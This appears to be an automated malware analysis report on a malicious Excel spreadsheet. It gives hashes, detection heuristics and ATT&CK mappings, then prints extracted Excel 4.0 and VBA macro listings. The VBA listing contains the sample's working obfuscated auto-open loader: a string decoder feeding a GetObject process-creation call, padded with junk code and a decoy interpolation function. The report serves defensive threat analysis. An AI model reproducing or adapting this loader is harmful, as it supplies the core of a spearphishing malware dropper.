Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1dd4ac4925b58a28…

MALICIOUS

Office (OLE)

Size: 225.5 KB
Created: 2019-06-13 08:28:30
Authoring application: Microsoft Excel
First seen: 2019-10-30
MD5: 8e0b8b5200e879d7a4a62df5ea30253a
SHA-1: 50c9dea7c3b2f396f22612f14dae00880ceffa9a
SHA-256: 1dd4ac4925b58a2833b5c8969e7c5b5ff5ec590b376d520e6c0a114b941e2075
Risk score: 280

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file is an Excel document containing both VBA and Excel 4.0 macros, with critical heuristics indicating an obfuscated auto-exec loader. The VBA macro uses GetObject to create and execute an object, likely downloading and running a second-stage payload. The presence of both macro types and the obfuscation suggests a sophisticated downloader, commonly used in spearphishing campaigns.

Heuristics (7)

  • ClamAV: Xls.Malware.Valyria-9756472-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro (high, OLE_VBA_WBOPEN)
    Workbook_Open auto-execution macro present
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call present in macro source
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 1802 bytes
SHA-256: 89fbf4ed436db0a706f3c5f49740bc1a215ec9721c9730853a5fba9ba9508dc6
Preview (first 1,000 lines of the extracted script):
' 0085     17 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Test Pag
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  HGUR
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  Test Pag,B7,*STACKERROR* not enough arguments for function: RAND,""
'  Test Pag,C7,*STACKERROR* not enough arguments for function: RAND,""
'  Test Pag,B8,[],""
'  Test Pag,C8,[],""
'  Test Pag,B9,[],""
'  Test Pag,C9,[],""
'  Test Pag,B10,[],""
'  Test Pag,C10,[],""
'  Test Pag,B11,[],""
'  Test Pag,C11,[],""
'  Test Pag,B12,[],""
'  Test Pag,C12,[],""
'  Test Pag,B13,[],""
'  Test Pag,C13,[],""
'  Test Pag,B14,[],""
'  Test Pag,C14,[],""
'  Test Pag,B15,[],""
'  Test Pag,C15,[],""
'  Test Pag,B16,[],""
'  Test Pag,C16,[],""
'  Test Pag,B17,[],""
'  Test Pag,C17,[],""
'  Test Pag,B18,[],""
'  Test Pag,C18,[],""
'  Test Pag,B19,[],""
'  Test Pag,C19,[],""
'  Test Pag,B20,[],""
'  Test Pag,C20,[],""
'  Test Pag,B21,[],""
'  Test Pag,C21,[],""
'  Test Pag,B22,[],""
'  Test Pag,C22,[],""
'  Test Pag,B23,[],""
'  Test Pag,C23,[],""
'  Test Pag,B24,[],""
'  Test Pag,C24,[],""
'  Test Pag,B25,[],""
'  Test Pag,C25,[],""
'  Test Pag,B26,[],""
'  Test Pag,C26,[],""
'  Test Pag,B27,[],""
'  Test Pag,C27,[],""
'  Test Pag,B28,[],""
'  Test Pag,C28,[],""
'  Test Pag,B29,[],""
'  Test Pag,C29,[],""
'  Test Pag,B30,[],""
'  Test Pag,C30,[],""
'  Test Pag,B31,[],""
'  Test Pag,C31,[],""
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5380 bytes
SHA-256: 97fe2c640d87e90ccefeed37ff424eb40b033eee1593c570f4d8bd046590cfbe
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private ra791e361394df2 As Variant
Private Function r5e63526981(b5ce25564f As Long) As String
Dim ed6d85e1f9c2 As Long: Dim df94f1edcdea6e As String
For ed6d85e1f9c2 = 1 To Len(ra791e361394df2(b5ce25564f)) Step 2: df94f1edcdea6e = df94f1edcdea6e & Chr(CInt(Chr(Int(0 - 13 - 5 + 9 + 3 + 7 + Int(12 / 7) - 10 + Int(12 / 4) + 8 + 35)) & Chr(Int(0 + 4 + Int(9 / 1) - 8 + Int(9 / 9) + 7 + 59)) & Mid(ra791e361394df2(b5ce25564f), ed6d85e1f9c2, 2)) - 4): Next
r5e63526981 = df94f1edcdea6e
End Function

Private Sub m9ebcfd864b5()
ra791e361394df2 = Split(ThisWorkbook.Sheets("HGURG").Range("J106").Value, ","): Dim ze67833e9a1: Set ze67833e9a1 = GetObject(r5e63526981(1)): ze67833e9a1.Create r5e63526981(0), Null, Null, Null
End Sub
Function Interpolate(X, x0 As Range, y0 As Range)
Dim n, i, j, k As Integer
  'Check that rows are same size'
  If (x0.Cells.Count <> y0.Cells.Count) Then
    MsgBox ("X and Y vector to interpolate command has to be same size!")
  End If
  
  n = x0.Cells.Count
  For i = 1 To n - 1
    j = x0(i).Value
    k = x0(i + 1).Value
    If j > k Then
      MsgBox ("X vector to interpolate command has to be increasing!")
      Return
    End If
  Next i
  If X < x0(1).Value Then
    k = (y0(2).Value - y0(1).Value) / (x0(2).Value - x0(1).Value)
    Interpolate = y0(1).Value + (X - x0(1).Value) * k
  'Check if X0>x0(END)'
  ElseIf X > x0(n).Value Then
    k = (y0(n).Value - y0(n - 1).Value) / (x0(n).Value - x0(n - 1).Value)
    Interpolate = y0(n).Value + (X - x0(n).Value) * k
  Else
   'Loop through values and find where the value are'
   For i = 1 To n
     If X <= x0(i).Value Then
       If (x0(i).Value - x0(i - 1).Value) <> 0 Then
         k = (y0(i).Value - y0(i - 1).Value) / (x0(i).Value - x0(i - 1).Value)
         Interpolate = y0(i).Value + (X - x0(i).Value) * k
       Else
         Interpolate = y0(i).Value + x0(i).Value
       End If
       Exit For
     End If
   Next i
  End If
End Function
Sub Workbook_Open()
Dim rffa72741bff76f As Long: rffa72741bff76f = 18
Dim tbcbdfa72a93736c As String
Dim z4c25f5aa6a189cf As Long
Select Case rffa72741bff76f
Case 5 * Int(75 / 79) - Int(3254 / 961) * 17
If 9 > 6 Then
Dim tomNet0 As Long
tomNet0 = (21 - 14) / 7
Dim xTopp0 As Long
xTopp0 = (tomNet0 / 25) - 9
Else
Dim lastNt0  As Long
lastNt0 = ((17 / 21) - 23)
Dim yRet0 As Long
yRet0 = (lastNt0 - 10) - 16
End If
Case 29 / Int(23 + 16 / 19) / 12
If 11 > 27 Then
Dim tomNet1 As Long
tomNet1 = (13 - 4) + 7
Dim xTopp1 As Long
xTopp1 = (tomNet1 + 8) - 26
Else
Dim lastNt1  As Long
lastNt1 = ((6 - 26) - 25)
Dim yRet1 As Long
yRet1 = (lastNt1 / 11) - 27
End If
Case 22 / Int(9 + 11 / 20) / 16
If 16 > 21 Then
Dim tomNet2 As Long
tomNet2 = (18 - 18) - 22
Dim xTopp2 As Long
xTopp2 = (tomNet2 - 13) - 22
Else
Dim lastNt2  As Long
lastNt2 = ((16 + 15) - 24)
Dim yRet2 As Long
yRet2 = (lastNt2 + 14) - 27
End If
Case 27 / Int(19 + 14 / 4) / 12
If 9 > 24 Then
Dim tomNet3 As Long
tomNet3 = (17 - 12) - 29
Dim xTopp3 As Long
xTopp3 = (tomNet3 - 26) - 24
Else
Dim lastNt3  As Long
lastNt3 = ((22 - 15) - 19)
Dim yRet3 As Long
yRet3 = (lastNt3 - 13) - 29
End If
Case 6 + (192 - 288) + 22
If 5 > 22 Then
Dim tomNet4 As Long
tomNet4 = (14 - 14) * 20
Dim xTopp4 As Long
xTopp4 = (tomNet4 + 20) - 9
Else
Dim lastNt4  As Long
lastNt4 = ((16 - 28) - 28)
Dim yRet4 As Long
yRet4 = (lastNt4 + 9) - 17
End If
Case 18 - (27 + 15) - 28
If 26 > 24 Then
Dim tomNet5 As Long
tomNet5 = (6 - 11) * 11
Dim xTopp5 As Long
xTopp5 = (tomNet5 * 15) - 6
Else
Dim lastNt5  As Long
lastNt5 = ((26 - 24) - 19)
Dim yRet5 As Long
yRet5 = (lastNt5 / 8) - 8
End If
Case ((((18 * 8) / 4) * 4) / 8):
Dim tomNet6 As Long
tomNet6 = (25 / 10) + 5 / 15
Dim
... (truncated)